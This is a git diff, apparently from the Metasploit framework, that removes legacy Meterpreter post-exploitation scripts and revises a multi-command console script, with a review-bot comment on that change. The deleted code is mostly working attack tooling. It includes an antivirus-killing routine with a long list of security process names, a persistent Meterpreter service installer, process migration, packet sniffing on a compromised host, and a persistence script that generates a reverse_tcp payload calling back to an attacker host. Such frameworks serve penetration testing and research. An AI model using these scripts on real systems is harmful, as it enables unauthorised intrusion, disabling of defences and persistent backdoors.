-#
-
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ]
-)
-def usage
- print_line("Usage:" + @@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- end
-}
-
-print_status("Killing Antivirus services on the target...")
-
-avs = %W{
- AAWTray.exe
- Ad-Aware.exe
- MSASCui.exe
- _avp32.exe
- _avpcc.exe
- _avpm.exe
- aAvgApi.exe
- ackwin32.exe
- adaware.exe
- advxdwin.exe
- agentsvr.exe
- agentw.exe
- alertsvc.exe
- alevir.exe
- alogserv.exe
- amon9x.exe
- anti-trojan.exe
- antivirus.exe
- ants.exe
- apimonitor.exe
- aplica32.exe
- apvxdwin.exe
- arr.exe
- atcon.exe
- atguard.exe
- atro55en.exe
- atupdater.exe
- atwatch.exe
- au.exe
- aupdate.exe
- auto-protect.nav80try.exe
- autodown.exe
- autotrace.exe
- autoupdate.exe
- avconsol.exe
- ave32.exe
- avgcc32.exe
- avgctrl.exe
- avgemc.exe
- avgnt.exe
- avgrsx.exe
- avgserv.exe
- avgserv9.exe
- avguard.exe
- avgw.exe
- avkpop.exe
- avkserv.exe
- avkservice.exe
- avkwctl9.exe
- avltmain.exe
- avnt.exe
- avp.exe
- avp.exe
- avp32.exe
- avpcc.exe
- avpdos32.exe
- avpm.exe
- avptc32.exe
- avpupd.exe
- avsched32.exe
- avsynmgr.exe
- avwin.exe
- avwin95.exe
- avwinnt.exe
- avwupd.exe
- avwupd32.exe
- avwupsrv.exe
- avxmonitor9x.exe
- avxmonitornt.exe
- avxquar.exe
- backweb.exe
- bargains.exe
- bd_professional.exe
- beagle.exe
- belt.exe
- bidef.exe
- bidserver.exe
- bipcp.exe
- bipcpevalsetup.exe
- bisp.exe
- blackd.exe
- blackice.exe
- blink.exe
- blss.exe
- bootconf.exe
- bootwarn.exe
- borg2.exe
- bpc.exe
- brasil.exe
- bs120.exe
- bundle.exe
- bvt.exe
- ccapp.exe
- ccevtmgr.exe
- ccpxysvc.exe
- cdp.exe
- cfd.exe
- cfgwiz.exe
- cfiadmin.exe
- cfiaudit.exe
- cfinet.exe
- cfinet32.exe
- claw95.exe
- claw95cf.exe
- clean.exe
- cleaner.exe
- cleaner3.exe
- cleanpc.exe
- click.exe
- cmd.exe
- cmd32.exe
- cmesys.exe
- cmgrdian.exe
- cmon016.exe
- connectionmonitor.exe
- cpd.exe
- cpf9x206.exe
- cpfnt206.exe
- ctrl.exe
- cv.exe
- cwnb181.exe
- cwntdwmo.exe
- datemanager.exe
- dcomx.exe
- defalert.exe
- defscangui.exe
- defwatch.exe
- deputy.exe
- divx.exe
- dllcache.exe
- dllreg.exe
- doors.exe
- dpf.exe
- dpfsetup.exe
- dpps2.exe
- drwatson.exe
- drweb32.exe
- drwebupw.exe
- dssagent.exe
- dvp95.exe
- dvp95_0.exe
- ecengine.exe
- efpeadm.exe
- emsw.exe
- ent.exe
- esafe.exe
- escanhnt.exe
- escanv95.exe
- espwatch.exe
- ethereal.exe
- etrustcipe.exe
- evpn.exe
- exantivirus-cnet.exe
- exe.avxw.exe
- expert.exe
- explore.exe
- f-agnt95.exe
- f-prot.exe
- f-prot95.exe
- f-stopw.exe
- fameh32.exe
- fast.exe
- fch32.exe
- fih32.exe
- findviru.exe
- firewall.exe
- fnrb32.exe
- fp-win.exe
- fp-win_trial.exe
- fprot.exe
- frw.exe
- fsaa.exe
- fsav.exe
- fsav32.exe
- fsav530stbyb.exe
- fsav530wtbyb.exe
- fsav95.exe
- fsgk32.exe
- fsm32.exe
- fsma32.exe
- fsmb32.exe
- gator.exe
- gbmenu.exe
- gbpoll.exe
- generics.exe
- gmt.exe
- guard.exe
- guarddog.exe
- hacktracersetup.exe
- hbinst.exe
- hbsrv.exe
- hotactio.exe
- hotpatch.exe
- htlog.exe
- htpatch.exe
- hwpe.exe
- hxdl.exe
- hxiul.exe
- iamapp.exe
- iamserv.exe
- iamstats.exe
- ibmasn.exe
- ibmavsp.exe
- icload95.exe
- icloadnt.exe
- icmon.exe
- icsupp95.exe
- icsuppnt.exe
- idle.exe
- iedll.exe
- iedriver.exe
- iexplorer.exe
- iface.exe
- ifw2000.exe
- inetlnfo.exe
- infus.exe
- infwin.exe
- init.exe
- intdel.exe
- intren.exe
- iomon98.exe
- istsvc.exe
- jammer.exe
- jdbgmrg.exe
- jedi.exe
- kavlite40eng.exe
- kavpers40eng.exe
- kavpf.exe
- kazza.exe
- keenvalue.exe
- kerio-pf-213-en-win.exe
- kerio-wrl-421-en-win.exe
- kerio-wrp-421-en-win.exe
- kernel32.exe
- killprocesssetup161.exe
- launcher.exe
- ldnetmon.exe
- ldpro.exe
- ldpromenu.exe
- ldscan.exe
- lnetinfo.exe
- loader.exe
- localnet.exe
- lockdown.exe
- lockdown2000.exe
- lookout.exe
- lordpe.exe
- lsetup.exe
- luall.exe
- luau.exe
- lucomserver.exe
- luinit.exe
- luspt.exe
- mapisvc32.exe
- mcagent.exe
- mcmnhdlr.exe
- mcshield.exe
- mctool.exe
- mcupdate.exe
- mcvsrte.exe
- mcvsshld.exe
- md.exe
- mfin32.exe
- mfw2en.exe
- mfweng3.02d30.exe
- mgavrtcl.exe
- mgavrte.exe
- mghtml.exe
- mgui.exe
- minilog.exe
- mmod.exe
- monitor.exe
- moolive.exe
- mostat.exe
- mpfagent.exe
- mpfservice.exe
- mpftray.exe
- mrflux.exe
- msapp.exe
- msbb.exe
- msblast.exe
- mscache.exe
- msccn32.exe
- mscman.exe
- msconfig.exe
- msdm.exe
- msdos.exe
- msiexec16.exe
- msinfo32.exe
- mslaugh.exe
- msmgt.exe
- msmsgri32.exe
- mssmmc32.exe
- mssys.exe
- msvxd.exe
- mu0311ad.exe
- mwatch.exe
- n32scanw.exe
- nav.exe
- navap.navapsvc.exe
- navapsvc.exe
- navapw32.exe
- navdx.exe
- navlu32.exe
- navnt.exe
- navstub.exe
- navw32.exe
- navwnt.exe
- nc2000.exe
- ncinst4.exe
- ndd32.exe
- neomonitor.exe
- neowatchlog.exe
- netarmor.exe
- netd32.exe
- netinfo.exe
- netmon.exe
- netscanpro.exe
- netspyhunter-1.2.exe
- netstat.exe
- netutils.exe
- nisserv.exe
- nisum.exe
- nmain.exe
- nod32.exe
- normist.exe
- norton_internet_secu_3.0_407.exe
- notstart.exe
- npf40_tw_98_nt_me_2k.exe
- npfmessenger.exe
- nprotect.exe
- npscheck.exe
- npssvc.exe
- nsched32.exe
- nssys32.exe
- nstask32.exe
- nsupdate.exe
- nt.exe
- ntrtscan.exe
- ntvdm.exe
- ntxconfig.exe
- nui.exe
- nupgrade.exe
- nvarch16.exe
- nvc95.exe
- nvsvc32.exe
- nwinst4.exe
- nwservice.exe
- nwtool16.exe
- ollydbg.exe
- onsrvr.exe
- optimize.exe
- ostronet.exe
- otfix.exe
- outpost.exe
- outpostinstall.exe
- outpostproinstall.exe
- padmin.exe
- panixk.exe
- patch.exe
- pavcl.exe
- pavproxy.exe
- pavsched.exe
- pavw.exe
- pccwin98.exe
- pcfwallicon.exe
- pcip10117_0.exe
- pcscan.exe
- pdsetup.exe
- periscope.exe
- persfw.exe
- perswf.exe
- pf2.exe
- pfwadmin.exe
- pgmonitr.exe
- pingscan.exe
- platin.exe
- pop3trap.exe
- poproxy.exe
- popscan.exe
- portdetective.exe
- portmonitor.exe
- powerscan.exe
- ppinupdt.exe
- pptbc.exe
- ppvstop.exe
- prizesurfer.exe
- prmt.exe
- prmvr.exe
- procdump.exe
- processmonitor.exe
- procexplorerv1.0.exe
- programauditor.exe
- proport.exe
- protectx.exe
- pspf.exe
- purge.exe
- qconsole.exe
- qserver.exe
- rapapp.exe
- rav7.exe
- rav7win.exe
- rav8win32eng.exe
- ray.exe
- rb32.exe
- rcsync.exe
- realmon.exe
- reged.exe
- regedit.exe
- regedt32.exe
- rescue.exe
- rescue32.exe
- rrguard.exe
- rshell.exe
- rtvscan.exe
- rtvscn95.exe
- rulaunch.exe
- run32dll.exe
- rundll.exe
- rundll16.exe
- ruxdll32.exe
- safeweb.exe
- sahagent.exe
- save.exe
- savenow.exe
- sbserv.exe
- sc.exe
- scam32.exe
- scan32.exe
- scan95.exe
- scanpm.exe
- scrscan.exe
- serv95.exe
- setup_flowprotector_us.exe
- setupvameeval.exe
- sfc.exe
- sgssfw32.exe
- sh.exe
- shellspyinstall.exe
- shn.exe
- showbehind.exe
- smc.exe
- sms.exe
- smss32.exe
- soap.exe
- sofi.exe
- sperm.exe
- spf.exe
- sphinx.exe
- spoler.exe
- spoolcv.exe
- spoolsv32.exe
- spyxx.exe
- srexe.exe
- srng.exe
- ss3edit.exe
- ssg_4104.exe
- ssgrate.exe
- st2.exe
- start.exe
- stcloader.exe
- supftrl.exe
- support.exe
- supporter5.exe
- svc.exe
- svchostc.exe
- svchosts.exe
- svshost.exe
- sweep95.exe
- sweepnet.sweepsrv.sys.swnetsup.exe
- symproxysvc.exe
- symtray.exe
- sysedit.exe
- system.exe
- system32.exe
- sysupd.exe
- taskmg.exe
- taskmgr.exe
- taskmo.exe
- taskmon.exe
- taumon.exe
- tbscan.exe
- tc.exe
- tca.exe
- tcm.exe
- tds-3.exe
- tds2-98.exe
- tds2-nt.exe
- teekids.exe
- tfak.exe
- tfak5.exe
- tgbob.exe
- titanin.exe
- titaninxp.exe
- tracert.exe
- trickler.exe
- trjscan.exe
- trjsetup.exe
- trojantrap3.exe
- tsadbot.exe
- tvmd.exe
- tvtmd.exe
- undoboot.exe
- updat.exe
- update.exe
- upgrad.exe
- utpost.exe
- vbcmserv.exe
- vbcons.exe
- vbust.exe
- vbwin9x.exe
- vbwinntw.exe
- vcsetup.exe
- vet32.exe
- vet95.exe
- vettray.exe
- vfsetup.exe
- vir-help.exe
- virusmdpersonalfirewall.exe
- vnlan300.exe
- vnpc3000.exe
- vpc32.exe
- vpc42.exe
- vpfw30s.exe
- vptray.exe
- vscan40.exe
- vscenu6.02d30.exe
- vsched.exe
- vsecomr.exe
- vshwin32.exe
- vsisetup.exe
- vsmain.exe
- vsmon.exe
- vsstat.exe
- vswin9xe.exe
- vswinntse.exe
- vswinperse.exe
- w32dsm89.exe
- w9x.exe
- watchdog.exe
- webdav.exe
- webscanx.exe
- webtrap.exe
- wfindv32.exe
- whoswatchingme.exe
- wimmun32.exe
- win-bugsfix.exe
- win32.exe
- win32us.exe
- winactive.exe
- window.exe
- windows.exe
- wininetd.exe
- wininitx.exe
- winlogin.exe
- winmain.exe
- winnet.exe
- winppr32.exe
- winrecon.exe
- winservn.exe
- winssk32.exe
- winstart.exe
- winstart001.exe
- wintsk32.exe
- winupdate.exe
- wkufind.exe
- wnad.exe
- wnt.exe
- wradmin.exe
- wrctrl.exe
- wsbgate.exe
- wupdater.exe
- wupdt.exe
- wyvernworksfirewall.exe
- xpf202en.exe
- zapro.exe
- zapsetup3001.exe
- zatutor.exe
- zonalm2601.exe
- zonealarm.exe
-}
-
-client.sys.process.get_processes().each do |x|
- if (avs.index(x['name'].downcase))
- print_status("Killing off #{x['name']}...")
- client.sys.process.kill(x['pid'])
- end
-end
diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
deleted file mode 100644
index 7eafcef435..0000000000
--- a/scripts/meterpreter/metsvc.rb
+++ /dev/null
@@ -1,139 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#
-# Meterpreter script for installing the meterpreter service
-#
-
-session = client
-
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"],
- "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"]
-)
-
-# Exec a command and return the results
-def m_exec(session, cmd)
- r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
- b = ""
- while(d = r.channel.read)
- b << d
- end
- r.channel.close
- r.close
- b
-end
-
-#
-# Default parameters
-#
-
-based = File.join(Msf::Config.data_directory, "meterpreter")
-rport = 31337
-install = false
-autoconn = false
-remove = false
-if client.platform =~ /win32|win64/
-
- #
- # Option parsing
- #
- opts.parse(args) do |opt, idx, val|
- case opt
- when "-h"
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-A"
- autoconn = true
- when "-r"
- remove = true
- end
- end
-
- #
- # Create the persistent VBS
- #
-
- if(not remove)
- print_status("Creating a meterpreter service on port #{rport}")
- else
- print_status("Removing the existing Meterpreter service")
- end
-
- #
- # Upload to the filesystem
- #
-
- tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
-
- print_status("Creating a temporary installation directory #{tempdir}...")
- client.fs.dir.mkdir(tempdir)
-
- # Use an array of `from -> to` associations so that things
- # such as metsrv can be copied from the appropriate location
- # but named correctly on the target.
- bins = {
- 'metsrv.x86.dll' => 'metsrv.dll',
- 'metsvc-server.exe' => nil,
- 'metsvc.exe' => nil
- }
-
- bins.each do |from, to|
- next if (from != "metsvc.exe" and remove)
- to ||= from
- print_status(" >> Uploading #{from}...")
- fd = client.fs.file.new(tempdir + "\\" + to, "wb")
- path = (from == 'metsrv.x86.dll') ? MetasploitPayloads.meterpreter_path('metsrv','x86.dll') : File.join(based, from)
- fd.write(::File.read(path, ::File.size(path)))
- fd.close
- end
-
- #
- # Execute the agent
- #
- if(not remove)
- print_status("Starting the service...")
- client.fs.dir.chdir(tempdir)
- data = m_exec(client, "metsvc.exe install-service")
- print_line("\t#{data}")
- else
- print_status("Stopping the service...")
- client.fs.dir.chdir(tempdir)
- data = m_exec(client, "metsvc.exe remove-service")
- print_line("\t#{data}")
- end
-
- if(remove)
- m_exec(client, "cmd.exe /c del metsvc.exe")
- end
-
- #
- # Setup the exploit/multi/handler if requested
- #
- if(autoconn)
- print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")
- mul = client.framework.exploits.create("multi/handler")
- mul.datastore['WORKSPACE'] = client.workspace
- mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
- mul.datastore['LPORT'] = rport
- mul.datastore['RHOST'] = client.session_host
- mul.datastore['ExitOnSession'] = false
- mul.exploit_simple(
- 'Payload' => mul.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
- end
-
-else
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
diff --git a/scripts/meterpreter/migrate.rb b/scripts/meterpreter/migrate.rb
deleted file mode 100644
index c8d1a1760b..0000000000
--- a/scripts/meterpreter/migrate.rb
+++ /dev/null
@@ -1,96 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-#
-# Simple example script that migrates to a specific process by name.
-# This is meant as an illustration.
-#
-
-
-spawn = false
-kill = false
-target_pid = nil
-target_name = nil
-
-opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu." ],
- "-f" => [ false, "Launch a process and migrate into the new process"],
- "-p" => [ true , "PID to migrate to."],
- "-k" => [ false, "Kill original process."],
- "-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]
-)
-
-opts.parse(args) { |opt, idx, val|
- case opt
- when "-f"
- spawn = true
- when "-k"
- kill = true
- when "-p"
- target_pid = val.to_i
- when "-n"
- target_name = val.to_s
- when "-h"
- print_line(opts.usage)
- raise Rex::Script::Completed
- else
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
-}
-
-# Creates a temp notepad.exe to migrate to depending the architecture.
-def create_temp_proc()
- # Use the system path for executable to run
- cmd = "notepad.exe"
- # run hidden
- proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
- return proc.pid
-end
-
-# In case no option is provided show help
-if args.length == 0
- print_line(opts.usage)
- raise Rex::Script::Completed
-end
-
-### Main ###
-
-if client.platform =~ /win32|win64/
- server = client.sys.process.open
- original_pid = server.pid
- print_status("Current server process: #{server.name} (#{server.pid})")
-
- if spawn
- print_status("Spawning notepad.exe process to migrate to")
- target_pid = create_temp_proc
- end
-
- if target_name and not target_pid
- target_pid = client.sys.process[target_name]
- if not target_pid
- print_status("Could not identify the process ID for #{target_name}")
- raise Rex::Script::Completed
- end
- end
-
- begin
- print_good("Migrating to #{target_pid}")
- client.core.migrate(target_pid)
- print_good("Successfully migrated to process #{}")
- rescue ::Exception => e
- print_error("Could not migrate in to process.")
- print_error(e)
- end
-
- if kill
- print_status("Killing original process with PID #{original_pid}")
- client.sys.process.kill(original_pid)
- print_good("Successfully killed process with PID #{original_pid}")
- end
-end
diff --git a/scripts/meterpreter/multi_console_command.rb b/scripts/meterpreter/multi_console_command.rb
index 0cbb87993c..d456741102 100644
--- a/scripts/meterpreter/multi_console_command.rb
+++ b/scripts/meterpreter/multi_console_command.rb
@@ -17,40 +17,22 @@
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
+ "-sl" => [ false,"Hide commands output for work in background sessions"],
"-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
"-rc" => [ true,"Text file with list of commands, one per line."]
)
-#Setting Argument variables
commands = nil
script = []
-help = 0
-
-################## Function Declarations ##################
-# Function for running a list of commands stored in a array, returs string
-def list_con_exec(cmdlst)
- print_status("Running Command List ...")
- cmdout = ""
- cmdlst.each do |cmd|
- next if cmd.strip.length < 1
- next if cmd[0,1] == "#"
- begin
- print_status "\tRunning command #{cmd}"
- @client.console.run_single(cmd)
- rescue ::Exception => e
- print_status("Error Running Command #{cmd}: #{e.class} #{e}")
- end
- end
- cmdout
-end
-
+help = false
+silence = false
def usage
print_line("Console Multi Command Execution Meterpreter Script ")
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
-################## Main ##################
+
@@exec_opts.parse(args) { |opt, idx, val|
case opt
@@ -68,14 +50,34 @@ end
end
when "-h"
- help = 1
+ help = true
+ when "-sl"
+ silence = true
end
}
-if args.length == 0 or help == 1 or commands.nil?
+if args.length == 0 or help or commands.nil?
usage
-else
- list_con_exec(commands)
- raise Rex::Script::Completed
end
+print_status("Running Command List ...")
+
+commands.each do |cmd|
+ next if cmd.strip.length < 1
+ next if cmd[0,1] == "#"
+ begin
+ print_status "\tRunning command #{cmd}"
+ if silence
+ @client.console.disable_output = true
+ end
+
+ @client.console.run_single(cmd)
+
+ if silence
+ @client.console.disable_output = false
+ end
+
+ rescue ::Exception => e
+ print_status("Error Running Command #{cmd}: #{e.class} #{e}")
+ end
+end
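Review bot: In the new command loop, `disable_output` is set to true before `run_single` but is only reset to false on the success path, so a command that raises is caught by the `rescue` and leaves the console silenced for every later command in the run (nothing else in the hunk resets it afterwards). Moving the reset into an `ensure` clause fixes this: replace the two `if silence` blocks with `@client.console.disable_output = true if silence` before `run_single`, and add `ensure` followed by `@client.console.disable_output = false if silence` after the `rescue` branch. If the console can already have output disabled when the script starts, saving the prior value and restoring that rather than `false` would be more precise, but that is not visible from this hunk. Separately, `rescue ::Exception` (carried over from the removed `list_con_exec` helper) also swallows interrupts and `SystemExit`; `rescue => e` covers the command errors this branch is meant to report.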
diff --git a/scripts/meterpreter/packetrecorder.rb b/scripts/meterpreter/packetrecorder.rb
deleted file mode 100644
index ba3e5dc1e2..0000000000
--- a/scripts/meterpreter/packetrecorder.rb
+++ /dev/null
@@ -1,219 +0,0 @@
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-
-@client = client
-
-# Interval for recording packets
-rec_time = 30
-
-# Interface ID
-int_id = nil
-
-# List Interfaces
-list_int = nil
-
-# Log Folder
-log_dest = nil
-@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-t" => [ true, "Time interval in seconds between recollection of packet, default 30 seconds."],
- "-i" => [ true, "Interface ID number where all packet capture will be done."],
- "-li" => [ false, "List interfaces that can be used for capture."],
- "-l" => [ true, "Specify and alternate folder to save PCAP file."]
-)
-meter_type = client.platform
-
-################## Function Declarations ##################
-
-# Usage Message Function
-#-------------------------------------------------------------------------------
-def usage
- print_line "Meterpreter Script for capturing packets in to a PCAP file"
- print_line "on a target host given a interface ID."
- print_line(@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
- print_error("#{meter} version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-# Function for creating log folder and returning log pa
-#-------------------------------------------------------------------------------
-def log_file(log_path = nil)
- #Get hostname
- host = @client.sys.config.sysinfo["Computer"]
-
- # Create Filename info to be appended to downloaded files
- filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
- # Create a directory for the logs
- if log_path
- logs = ::File.join(log_path, 'logs', 'packetrecorder', host + filenameinfo )
- else
- logs = ::File.join(Msf::Config.log_directory, "scripts", 'packetrecorder', host + filenameinfo )
- end
-
- # Create the log directory
- ::FileUtils.mkdir_p(logs)
-
- #logfile name
- logfile = logs + ::File::Separator + host + filenameinfo + ".cap"
- return Rex::FileUtils.clean_path(logfile)
-end
-
-#Function for Starting Capture
-#-------------------------------------------------------------------------------
-def startsniff(interface_id)
- begin
- #Load Sniffer module
- @client.core.use("sniffer")
- print_status("Starting Packet capture on interface #{interface_id}")
- #starting packet capture with a buffer size of 200,000 packets
- @client.sniffer.capture_start(interface_id, 200000)
- print_good("Packet capture started")
- rescue ::Exception => e
- print_status("Error Starting Packet Capture: #{e.class} #{e}")
- raise Rex::Script::Completed
- end
-end
-
-#Function for Recording captured packets into PCAP file
-#-------------------------------------------------------------------------------
-def packetrecord(packtime, logfile,intid)
- begin
- rec = 1
- print_status("Packets being saved in to #{logfile}")
- print_status("Packet capture interval is #{packtime} Seconds")
- #Inserting Packets every number of seconds specified
- while rec == 1
- path_cap = logfile
- path_raw = logfile + '.raw'
- fd = ::File.new(path_raw, 'wb+')
- #Flushing Buffers
- res = @client.sniffer.capture_dump(intid)
- bytes_all = res[:bytes] || 0
- bytes_got = 0
- bytes_pct = 0
- while (bytes_all > 0)
- res = @client.sniffer.capture_dump_read(intid,1024*512)
- bytes_got += res[:bytes]
- pct = ((bytes_got.to_f / bytes_all.to_f) * 100).to_i
- if(pct > bytes_pct)
- bytes_pct = pct
- end
- break if res[:bytes] == 0
- fd.write(res[:data])
- end
-
- fd.close
- #Converting raw file to PCAP
- fd = nil
- if(::File.exist?(path_cap))
- fd = ::File.new(path_cap, 'ab+')
- else
- fd = ::File.new(path_cap, 'wb+')
- fd.write([0xa1b2c3d4, 2, 4, 0, 0, 65536, 1].pack('NnnNNNN'))
- end
- od = ::File.new(path_raw, 'rb')
-
- # TODO: reorder packets based on the ID (only an issue if the buffer wraps)
- while(true)
- buf = od.read(20)
- break if not buf
-
- idh,idl,thi,tlo,len = buf.unpack('N5')
- break if not len
- if(len > 10000)
- print_error("Corrupted packet data (length:#{len})")
- break
- end
-
- pkt_ts = Rex::Proto::SMB::Utils.time_smb_to_unix(thi,tlo)
- pkt = od.read(len)
- fd.write([pkt_ts,0,len,len].pack('NNNN')+pkt)
- end
- od.close
- fd.close
-
- ::File.unlink(path_raw)
- sleep(2)
- sleep(packtime.to_i)
-
- end
- rescue::Exception => e
- print("\n")
- print_status("#{e.class} #{e}")
- print_good("Stopping Packet sniffer...")
- @client.sniffer.capture_stop(intid)
- end
-end
-
-# Function for listing interfaces
-# ------------------------------------------------------------------------------
-def int_list()
- begin
- @client.core.use("sniffer")
- ifaces = @client.sniffer.interfaces()
-
- print_line()
-
- ifaces.each do |i|
- print_line(sprintf("%d - '%s' ( type:%d mtu:%d usable:%s dhcp:%s wifi:%s )",
- i['idx'], i['description'],
- i['type'], i['mtu'], i['usable'], i['dhcp'], i['wireless'])
- )
- end
-
- print_line()
- rescue ::Exception => e
- print_error("Error listing interface: #{e.class} #{e}")
- end
- raise Rex::Script::Completed
-end
-
-################## Main ##################
-@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-h"
- usage
- when "-i"
- int_id = val.to_i
- when "-l"
- log_dest = val
- when "-li"
- list_int = 1
- when "-t"
- rec_time = val
- end
-}
-
-# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-
-if !int_id.nil? or !list_int.nil?
- if not is_uac_enabled? or is_admin?
- if !list_int.nil?
- int_list
- else
- pcap_file = log_file(log_dest)
- startsniff(int_id)
- packetrecord(rec_time,pcap_file,int_id)
- end
- else
- print_error("Access denied (UAC enabled?)")
- end
-else
- usage
-end
diff --git a/scripts/meterpreter/persistence.rb b/scripts/meterpreter/persistence.rb
deleted file mode 100644
index a191115725..0000000000
--- a/scripts/meterpreter/persistence.rb
+++ /dev/null
@@ -1,259 +0,0 @@
-# Author: Carlos Perez at carlos_perez[at]darkoperator.com
-#-------------------------------------------------------------------------------
-################## Variable Declarations ##################
-
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to imporve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-# Meterpreter Session
-@client = client
-
-key = "HKLM"
-
-# Default parameters for payload
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-delay = 5
-install = false
-autoconn = false
-serv = false
-altexe = nil
-target_dir = nil
-payload_type = "windows/meterpreter/reverse_tcp"
-script = nil
-script_on_target = nil
-
-
-@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on which the system running Metasploit is listening"],
- "-i" => [ true, "The interval in seconds between each connection attempt"],
- "-X" => [ false, "Automatically start the agent when the system boots"],
- "-U" => [ false, "Automatically start the agent when the User logs on"],
- "-S" => [ false, "Automatically start the agent on boot as a service (with SYSTEM privileges)"],
- "-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the agent"],
- "-L" => [ true, "Location in target host to write payload to, if none \%TEMP\% will be used."],
- "-T" => [ true, "Alternate executable template to use"],
- "-P" => [ true, "Payload to use, default is windows/meterpreter/reverse_tcp."]
-)
-
-################## Function Declarations ##################
-
-# Usage Message Function
-#-------------------------------------------------------------------------------
-def usage
- print_line "Meterpreter Script for creating a persistent backdoor on a target host."
- print_line(@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-# Wrong Meterpreter Version Message Function
-#-------------------------------------------------------------------------------
-def wrong_meter_version(meter)
- print_error("#{meter} version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-
-# Function for Creating the Payload
-#-------------------------------------------------------------------------------
-def create_payload(payload_type,lhost,lport)
- print_status("Creating Payload=#{payload_type} LHOST=#{lhost} LPORT=#{lport}")
- payload = payload_type
- pay = client.framework.payloads.create(payload)
- pay.datastore['LHOST'] = lhost
- pay.datastore['LPORT'] = lport
- return pay.generate
-end
-
-# Function for Creating persistent script
-#-------------------------------------------------------------------------------
-def create_script(delay,altexe,raw,is_x64)
- if is_x64
- if altexe
- vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay, :template => altexe})
- else
- vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay})
- end
- else
- if altexe
- vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay, :template => altexe})
- else
- vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
- {:persist => true, :delay => delay})
- end
- end
- print_status("Persistent agent script is #{vbs.length} bytes long")
- return vbs
-end
-
-# Function for creating log folder and returning log path
-#-------------------------------------------------------------------------------
-def log_file(log_path = nil)
- #Get hostname
- host = @client.sys.config.sysinfo["Computer"]
-
- # Create Filename info to be appended to downloaded files
- filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
- # Create a directory for the logs
- if log_path
- logs = ::File.join(log_path, 'logs', 'persistence',
- Rex::FileUtils.clean_path(host + filenameinfo) )
- else
- logs = ::File.join(Msf::Config.log_directory, 'persistence',
- Rex::FileUtils.clean_path(host + filenameinfo) )
- end
-
- # Create the log directory
- ::FileUtils.mkdir_p(logs)
-
- #logfile name
- logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
- return logfile
-end
-
-# Function for writing script to target host
-#-------------------------------------------------------------------------------
-def write_script_to_target(target_dir,vbs)
- if target_dir
- tempdir = target_dir
- else
- tempdir = @client.fs.file.expand_path("%TEMP%")
- end
- tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
- fd = @client.fs.file.new(tempvbs, "wb")
- fd.write(vbs)
- fd.close
- print_good("Persistent Script written to #{tempvbs}")
- # Escape windows pathname separators.
- file_local_write(@clean_up_rc, "rm #{tempvbs.gsub(/\\/, '//')}\n")
- return tempvbs
-end
-
-# Function for setting exploit/multi/handler for autocon
-#-------------------------------------------------------------------------------
-def set_handler(selected_payload,rhost,rport)
- print_status("Starting connection handler at port #{rport} for #{selected_payload}")
- mul = client.framework.exploits.create("multi/handler")
- mul.datastore['WORKSPACE'] = @client.workspace
- mul.datastore['PAYLOAD'] = selected_payload
- mul.datastore['LHOST'] = rhost
- mul.datastore['LPORT'] = rport
- mul.datastore['EXITFUNC'] = 'process'
- mul.datastore['ExitOnSession'] = false
-
- mul.exploit_simple(
